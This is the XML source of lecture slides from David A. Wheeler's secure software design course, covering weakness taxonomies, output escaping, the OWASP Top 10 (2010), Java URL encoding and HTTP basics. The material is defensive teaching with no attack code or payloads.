            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Content Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5267160" y="1628640"/>
            <a:ext cx="3571920" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>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ffer Handling*</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jection* (SQL, command, etc.)</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cryption and Randomness*</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 Handling*</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formation Leaks*</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umber Handling*</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rol flow management*</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itialization and Shutdown [of resources/components]*</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 Error</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ystem Element Isolation</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rror Handling* and Fault isolation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="345960" indent="-345960">
              <a:lnSpc>
                <a:spcPct val="10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ointer and reference handling*</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Left Brace 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871880" y="1552680"/>
            <a:ext cx="685800" cy="3886200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 438120 w 685800"/>
              <a:gd name="textAreaRight" fmla="*/ 686160 w 685800"/>
              <a:gd name="textAreaTop" fmla="*/ 17640 h 3886200"/>
              <a:gd name="textAreaBottom" fmla="*/ 3868560 h 3886200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="0"/>
                  <a:pt x="10800" y="159"/>
                  <a:pt x="10800" y="318"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="12834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="12993"/>
                  <a:pt x="5400" y="13152"/>
                  <a:pt x="0" y="13152"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="13152"/>
                  <a:pt x="10800" y="13311"/>
                  <a:pt x="10800" y="13470"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="21282"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="2144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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4544280" y="6353280"/>
            <a:ext cx="384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ps to NSA Center for Assured Software (CAS) structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="310" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327560" y="3909600"/>
            <a:ext cx="529200" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676760" y="5724360"/>
            <a:ext cx="4321440" cy="5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urce: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>State-of-the-Art Resources (SOAR) for Software Vulnerabilit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Detection, Test, and Evaluation</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> by David A. Wheeler &amp; Rama S. Moorth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stitute for Defense Analyses Paper P-5061, July 2014</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characters: Same issue</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cape any characters you send back that might be interpreted as metacharac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on problems in HTML/XML:  &lt; &gt; &amp;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llenge: Must ensure browser interprets them the same wa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d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ain, whitelist</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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41069-F06A-4A3B-B22F-AF193C560F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3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careful sending output back</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scape metacharacters so not misinterpreted</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b applica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ware of session fixation, XSS, XSRF</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ing secure software is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> just knowing &amp; countering common weakness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od design!  Prevent, detect, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> recov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akness lists can help remind/focus on biggest problems, taxonomies help describ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a number of common past mistakes – once you know what they are, you can avoid them</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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F0BB-A1C1-4504-B621-65EF26DE6B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up</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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4B81-5041-40B3-AA64-A15872E8CB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WASP Top 10 (2010)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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B7FB-0CC5-4C96-A105-87FAB25B18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320" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609480" y="1371600"/>
          <a:ext cx="8077320" cy="4348080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4191120"/>
                <a:gridCol w="38862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urity Ris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vered in class session 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1: Inj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 out (SQL injection, shell inj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2: Cross-Site Scripting (X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3: Broken Authentication and Sess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ent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4: Insecure Direct Object Refe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least privile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5: Cross-Site Request Forgery (CSR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6: Security Misconfigu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7: Insecure Cryptographic Stor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yptograph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8: Failure to Restrict URL Ac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least privilege)/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9: Insufficient Transport Layer Prot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yptograph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10: Unvalidated Redirects and Forward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Web ap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ased under CC BY-SA 3.0</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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esentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) licens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are fre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hare — to copy, distribute and transmi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Remix — to adap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ake commercial use of the work</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 the following condit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ribution — You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of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re Alike — If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this on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conditions can be waived by permission from the copyright hold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wheeler at dwheeler dot co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ails at: http://creativecommons.org/licenses/by-sa/3.0/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ribute me as “David A. Wheeler”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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E85E-ADD5-44BC-AAEB-F03A98845F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net.URLEncoder.encode</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(String s, String enc)</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ranslates a string into application/x-www-form-urlencoded format using a specific encoding scheme (e.g., UTF-8)</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les (per Java spec):</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ain same: A-Z, a-z, 0-9, ".", "-", "*", and "_"</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ace converted to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ther characters are unsafe:</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rted into encoding scheme (UTF-8 recommende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ch byte is represented by "%xy", where xy is 2-digit hex representation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="19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G., encode("The string ü@foo-bar" , "UTF-8") produces "The+string+%C3%BC%40foo-ba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UTF-8, ü is encoded as two bytes C3 (hex) and BC (hex), while @ is encoded as one byte 40 (hex)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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DE9E-E123-46CA-BEB0-B6D49D2846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b applications: HTTP, HTTPS, HTML</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 Protocol for requesting/sending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S: HTTP over SSL/TLS (encryp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ML: Common data format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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B19C-11EE-4EA3-868F-E2F931021E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22:14:44Z</dcterms:created>
  <dc:creator>David A. Wheeler</dc:creator>
  <dc:description/>
  <cp:keywords>input validation regulation expressions attack surface</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>David A. Wheeler</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-09T16:38:57Z</dcterms:modified>
  <cp:revision>497</cp:revision>
  <dc:subject>Secure Software Design &amp; Programming - Input Validation</dc:subject>
  <dc:title>SWE 781 / ISA 681 Secure Software Design &amp; Programming</dc:title>
</cp:coreProperties>
</file>